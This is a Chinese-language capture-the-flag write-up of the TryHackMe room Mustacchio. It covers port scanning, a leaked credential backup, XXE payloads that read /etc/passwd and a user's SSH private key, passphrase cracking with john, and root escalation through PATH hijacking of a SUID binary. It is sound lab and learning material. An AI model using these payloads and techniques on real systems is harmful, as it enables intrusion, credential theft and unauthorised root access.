打靶记录(一零八)之THMMustacchio

端口扫描

nmap --min-rate=10000 -p- 10.10.155.198
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 08:34 UTC
Nmap scan report for ip-10-10-240-97.eu-west-1.compute.internal (10.10.155.198)
Host is up (0.0038s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8765/tcp open  ultraseek-http
MAC Address: 02:3D:37:D2:CB:0F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds

nmap -sC -sT -sV -O -p22,80,8765 10.10.155.198
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 08:35 UTC
Nmap scan report for ip-10-10-240-97.eu-west-1.compute.internal (10.10.155.198)
Host is up (0.00038s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
|   256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_  256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 02:3D:37:D2:CB:0F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (97%), Crestron XPanel control system (90%), Linux 5.4 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.40 seconds

Getshell

80端口只是一个门户网站，感觉什么功能都没有，扫描一下目录

feroxbuster -u http://10.10.155.198/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,jsp,php,html,bak

发现一个 http://10.10.155.198/custom/js/users.bak

mv users.bak users.sqlite3

用sqlite3打开，得到凭据:

admin:bulldog19

在8765端口的登录界面可以成功登录,在源码中发现注释

除此之外还有一个/auth/dontforget.bak，里面有下载查看,是一个xml文件

并且可以上传一个POST表单，名为xml，根据房间提示可以XXE，上payloadAllThing找一段payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [  
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<comment>
  <com>&xxe;</com>
</comment>

发现能够回显!尝试获取barry的私钥

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [  
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
  <com>&xxe;</com>
</comment>

保存，给予权限尝试连接，但是发现需要密码

ssh2john key >hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (key)     
1g 0:00:00:00 DONE (2024-03-18 11:54) 1.250g/s 3713Kp/s 3713Kc/s 3713KC/s urieljr.k..urielfabricio07
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

提权

在joe的家目录发现一个/home/joe/live_log，并有suid位，放到ida反编译

{
  setuid(0);
  setgid(0);
  printf("Live Nginx Log Reader");
  return system("tail -f /var/log/nginx/access.log");
}

相对路径调用了tail,劫持一个

echo 'cp /bin/bash /tmp/rootbash ;chmod +xs /tmp/rootbash' >tail
chmod +x tail
export PATH=/tmp:$PATH

再次运行，我们是root!

碎碎念

第一次接触xxe,虽然只是抄了一段payload,似乎要学习XML中的DTD,有空看一下